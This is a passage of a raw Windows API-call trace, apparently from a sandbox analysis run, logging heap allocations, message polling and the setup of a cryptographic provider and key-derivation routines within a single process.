0x2e540f8 [0156.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0156.344] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0156.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0156.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0156.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0156.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ffb8 [0156.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0156.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0156.344] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0156.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69b68 [0156.344] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69b68, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0156.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0156.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0156.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0156.387] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0156.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0156.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0156.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ffb8 | out: hHeap=0x970000) returned 1 [0156.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0156.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0156.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0156.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0156.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0156.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0156.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0156.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0156.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0156.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0156.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0156.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0156.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0156.392] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0156.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0156.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0156.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0156.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0156.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0156.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0156.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0156.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0156.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0156.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0156.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0156.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0156.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0156.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0156.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0156.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0156.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0156.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0156.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0156.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0156.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0156.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0156.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0156.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0156.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0156.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0156.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0156.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0156.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0156.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0156.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0156.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0156.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0156.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0156.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0156.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0156.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0156.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0156.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0156.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0156.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0156.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0156.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0156.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0156.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0156.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0156.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0156.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0156.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0156.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0156.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0156.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0156.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0156.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0156.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0156.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0156.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0156.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0156.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0156.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0156.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0156.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0156.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0156.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0156.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0156.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0156.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0156.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0156.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0156.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0156.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0156.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0156.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0156.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0156.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0156.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0156.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0156.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0156.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0156.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0156.395] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0156.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0156.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0156.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0156.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0156.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0156.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0156.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0156.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0156.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0156.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0156.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0156.396] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0156.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80220 [0156.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0156.396] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0156.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80220 | out: hHeap=0x970000) returned 1 [0156.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0156.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0156.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c68 [0156.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0156.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0156.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0156.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0156.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0156.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0156.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50848 [0156.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0156.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0156.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0156.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0156.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0156.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0156.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0156.396] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0156.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0156.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0156.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0156.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0156.397] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0156.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0156.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0156.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0156.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0156.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0156.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0156.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0156.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0156.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0156.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0156.397] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0156.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0156.397] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0156.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0156.397] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0156.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0156.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0156.397] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0156.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0156.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0156.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0156.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0156.397] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0156.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0156.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0156.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0156.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0156.398] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0156.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0156.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0156.398] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0156.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0156.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0156.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0156.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0156.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0156.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0156.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0156.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0156.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0156.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0156.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0156.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0156.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0156.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0156.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0156.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0156.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0156.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0156.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0156.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0156.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0156.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0156.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0156.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0156.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0156.399] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0156.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0156.399] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0156.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0156.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0156.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0156.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0156.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0156.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0156.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0156.399] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0156.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0156.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0156.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0156.399] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0156.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0156.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0156.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0156.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d08 [0156.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0156.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0156.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0156.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0156.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0156.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c68 